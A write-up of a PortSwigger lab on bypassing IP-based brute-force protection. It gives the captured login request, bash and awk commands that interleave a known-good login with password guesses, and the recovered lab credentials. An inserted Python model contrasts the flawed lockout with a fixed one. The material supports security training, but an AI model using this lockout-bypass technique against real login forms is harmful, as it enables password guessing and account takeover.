PortSwigger Lab: Broken brute-force protection, IP block

Jun Takemura · March 6, 2025

Task

This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim’s password, then log in and access their account page.

Hint

Advanced users may want to solve this lab by using a macro or the Turbo Intruder extension. However, it is possible to solve the lab without using these advanced features.

Attempt

I usually use ffuf for this kind of stuff, but this time I wanted to get used to Burp's Intruder.

Logged in as wiener and captured the request:

POST /login HTTP/2
Host: ID.web-security-academy.net
Cookie: session=VALUE
Content-Length: 30
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ID.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

username=wiener&password=peter

Before starting the brute-force, I tried whether I could directly change the value of the id parameter in this request:

GET /my-account?id=wiener

This didn’t work and sent me back to the login page.

I created a wordlist from the PortSwigger password list and started a brute-force attack using Intruder. There was rate limiting and I got blocked: "You have made too many incorrect login attempts. Please try again in 1 minute(s)." Now I needed to bypass this restriction.

After logging in as wiener again, I noticed the rate limit was reset. At first I thought a successful login lifted the temporary ban, but after some trials I found that a successful login before getting banned resets the counter.
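To make the logic flaw concrete from the defender's side, here is an added model of the lab's lockout (not PortSwigger's code; the lab server cannot be run offline). FlawedGate keeps one failure counter per IP and clears it on any successful login, which is the behaviour observed above; FixedGate keeps a sliding window of recent failures per IP that a successful login does not shrink. Both are driven with the interleaved sequence the write-up's wordlists produce. The lockout threshold, the one-attempt-per-second clock, the candidate list and the credential store are constructed assumptions.

```python
"""Model of the lockout logic flaw behind this lab (added example, not the lab's code)."""
from collections import defaultdict, deque

# Constructed credential store; carlos:robert is the only password the write-up reveals.
USERS = {"wiener": "peter", "carlos": "robert"}
MAX_FAILURES = 3       # assumed lockout threshold; the lab's exact value is not stated
BLOCK_SECONDS = 60     # matches the lab's "try again in 1 minute(s)" message

# Constructed candidate list standing in for the PortSwigger password list.
SAMPLE_CANDIDATES = ["123456", "password", "qwerty", "letmein", "robert", "dragon"]


class FlawedGate:
    """Per-IP failure counter that any successful login resets (the flaw)."""

    def __init__(self):
        self.failures = defaultdict(int)
        self.blocked_until = {}

    def login(self, ip, username, password, now):
        if self.blocked_until.get(ip, 0) > now:
            return "blocked"
        if USERS.get(username) == password:
            self.failures[ip] = 0          # the bug: success for *any* account clears the count
            return "ok"
        self.failures[ip] += 1
        if self.failures[ip] >= MAX_FAILURES:
            self.blocked_until[ip] = now + BLOCK_SECONDS
            self.failures[ip] = 0
        return "fail"


class FixedGate:
    """Sliding window of recent failures per IP; successful logins do not shrink it."""

    def __init__(self):
        self.recent_failures = defaultdict(deque)

    def login(self, ip, username, password, now):
        window = self.recent_failures[ip]
        while window and window[0] <= now - BLOCK_SECONDS:
            window.popleft()              # only the passage of time expires a failure
        if len(window) >= MAX_FAILURES:
            return "blocked"              # refused before the password is even compared
        if USERS.get(username) == password:
            return "ok"
        window.append(now)
        return "fail"


def interleaved_attempts(candidates, every=2):
    """Yield (username, password) pairs in the write-up's pattern:
    `every` guesses for carlos, then one known-good wiener:peter login."""
    for i, guess in enumerate(candidates, start=1):
        yield "carlos", guess
        if i % every == 0:
            yield "wiener", "peter"


def run(gate, candidates, ip="198.51.100.7"):
    """Drive a gate with the interleaved sequence at one attempt per second.
    Returns (outcome, attempts): outcome is the password the gate accepted for
    carlos, 'blocked' if the gate ever refused a request, or None if neither."""
    attempts = 0
    for user, pw in interleaved_attempts(candidates):
        result = gate.login(ip, user, pw, now=attempts)
        attempts += 1
        if result == "blocked":
            return "blocked", attempts
        if result == "ok" and user == "carlos":
            return pw, attempts
    return None, attempts


if __name__ == "__main__":
    print("flawed:", run(FlawedGate(), SAMPLE_CANDIDATES))   # counter never reaches the limit
    print("fixed: ", run(FixedGate(), SAMPLE_CANDIDATES))    # blocked on the fourth bad guess
```

Against the flawed gate the interleaved run never trips the block and reaches carlos:robert; against the fixed gate the fourth wrong guess is refused because the wiener login in between did not remove the earlier failures. A per-IP window on its own is still a weak control, so in practice it is paired with a per-account failure counter so that a flood of failures against one username is noticed regardless of source.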

So I need a username wordlist like this:

carlos
carlos
wiener
carlos
...

Quickly made a wordlist with bash:

for i in {1..50}; do echo "carlos"; echo "carlos"; echo "wiener"; done > carlos.dict

I also needed to modify the password wordlist so that every third line is the known-good password:

awk '{print; if (NR % 2 == 0) print "peter";}' pass.dict > pass2.dict

Using the pitchfork attack type, I set each file for the corresponding payload position and started the attack. Found the credentials carlos:robert.
